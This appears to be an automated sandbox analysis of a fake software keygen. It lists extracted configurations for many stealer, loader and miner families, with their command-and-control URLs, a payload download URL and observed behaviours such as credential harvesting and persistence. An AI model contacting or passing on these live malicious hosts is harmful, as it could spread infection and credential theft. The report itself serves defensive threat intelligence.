Analysis
-
max time kernel
37s -
max time network
484s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
24-03-2021 21:38
Static task
static1
Behavioral task
behavioral1
Sample
Ciberlink.power.dvd.8.delux.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Ciberlink.power.dvd.8.delux.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Ciberlink.power.dvd.8.delux.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Ciberlink.power.dvd.8.delux.keygen.exe
Resource
win10v20201028
General
-
Target
Ciberlink.power.dvd.8.delux.keygen.exe
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
fickerstealer
deniedfight.com:80
lukkeze.space:80
Extracted
raccoon
dfa7b4d385486b737f84d608857eb43733ffd299
-
url4cnc
https://telete.in/j9ca1pel
Extracted
icedid
1235390667
petelbomber.xyz
Extracted
redline
black
blackeyed.top:80
Extracted
redline
19test200
erherst.tk:80
Extracted
cryptbot
bazfr32.top
morwhy03.top
-
payload_url
http://akrvt04.top/download.php?file=lv.exe
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
smokeloader
2020
http://xsss99.icu/upload/
http://bingooodsg.icu/upload/
http://junntd.xyz/upload/
http://ginessa11.xyz/upload/
http://overplayninsx.xyz/upload/
http://bananinze.com/upload/
http://daunimlas.com/upload/
Extracted
metasploit
windows/single_exec
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Extracted
amadey
2.14
176.111.174.249/j7csltegf/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
CryptBot Payload 2 IoCs
resource yara_rule behavioral3/memory/5344-365-0x0000000000400000-0x00000000004E3000-memory.dmp family_cryptbot behavioral3/memory/5344-363-0x0000000002ED0000-0x0000000002FAF000-memory.dmp family_cryptbot -
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/7252-432-0x0000000003A90000-0x00000000042ED000-memory.dmp family_glupteba behavioral3/memory/7252-434-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/7252-433-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral3/memory/5392-249-0x0000000005AC0000-0x0000000005BB2000-memory.dmp family_redline behavioral3/memory/5392-252-0x00000000059C0000-0x0000000005AB0000-memory.dmp family_redline behavioral3/memory/4452-354-0x0000000000400000-0x0000000000426000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
IcedID First Stage Loader 1 IoCs
resource yara_rule behavioral3/memory/5764-242-0x0000000001050000-0x0000000001057000-memory.dmp IcedidFirstLoader -
XMRig Miner Payload 8 IoCs
resource yara_rule behavioral3/memory/5588-312-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/5588-297-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/5588-327-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/5000-584-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/5000-613-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/9148-723-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral3/memory/9148-735-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral3/memory/9148-757-0x0000000140000000-0x000000014072E000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 2192 keygen-pr.exe 4092 keygen-step-1.exe 2208 keygen-step-3.exe 3432 keygen-step-4.exe 1260 key.exe 3004 Setup.exe 808 key.exe 1656 multitimer.exe 1004 setups.exe 1252 setups.tmp 900 askinstall20.exe 4412 md2_2efs.exe 4636 multitimer.exe 4784 multitimer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 5 IoCs
pid Process 1252 setups.tmp 1252 setups.tmp 1252 setups.tmp 1252 setups.tmp 1252 setups.tmp -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 6480 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral3/memory/5392-241-0x0000000000400000-0x0000000001065000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\05taj2qnyfw = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\45BA75ZGKR\\multitimer.exe\" 1 3.1616622034.605bb1d22c01a" multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 18 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 651 checkip.amazonaws.com 99 ipinfo.io 203 ip-api.com 433 checkip.amazonaws.com 483 api.ipify.org 177 checkip.amazonaws.com 235 api.ipify.org 572 checkip.amazonaws.com 627 api.2ip.ua 101 ipinfo.io 537 ipinfo.io 539 ipinfo.io 657 api.2ip.ua 628 api.2ip.ua 109 api.ipify.org 163 ip-api.com 229 checkip.amazonaws.com 541 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1260 set thread context of 808 1260 key.exe 89 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 200 4376 WerFault.exe 132 6572 5232 WerFault.exe 147 8628 6848 WerFault.exe 319 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8352 schtasks.exe 8692 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 4680 timeout.exe 7664 timeout.exe 8036 timeout.exe 8788 timeout.exe 9052 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 10 IoCs
pid Process 2940 taskkill.exe 1716 taskkill.exe 7368 taskkill.exe 7532 taskkill.exe 5912 taskkill.exe 6528 taskkill.exe 3656 taskkill.exe 6816 taskkill.exe 5448 taskkill.exe 4820 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main Process not Found Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{A5038DFD-6E62-46B2-9051-D8300690059F}" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 998267c856add601 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000009512d29805fb5e3a33bcc27c9e01687ded91362d0acdffacaa57b5528c03513a061b49e17a804cd9ec4de5d263f1a80662e3dd8394789f1a647482dae74ddcbb525d476af25ae90546df9426e8ddccf4943d379ea9095436cae16cfc90a435d50f78090f99a97c076e11971036e7872d2141a5be609ff35ca340c739da28e034350cc41b248eb3e45784c443be2dc869898d2200285aa26d22309e5c85f90a471cb90b032227863f04d8605a70d101f4c2c2b316b559e48fc0506f2aae378e11321fa5a599958d8090adeb8aa8f1833a18818e9dfebe1745b6424723c30296f8dcdde827bef87b558da343f913aff22e80680bf480a8ddd043a5df57fa7a4340d595f45844710d7af75a0eeeaa2976765919aaae7237eae9c418294b75c01c6793e68ba8e51e84da787307fb0581f46afc32ca92638bfdc0f23d0fe469f2aa4f9a7037afe92055fa348cb5b48fd5beeb9a5435278cc3ee5349b37d7161313c36abd3e74153984bb22246a87e0d471bfe04202ed2c5017913911931b8689d897b06af7b1a11a4903ef441306483f5573dcb347087666436d6da75042561315f0a65cfd8289f01 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f98b4732fe20d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000004fb6daeb6bd951c8601efa9e991a1830ccdbe15aa5778d4c3030881791b54a94d80eeaddd4d53d128f1789636ad0a74a12b85513e3b3844f929 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Pack = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0630aa31fe20d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe -
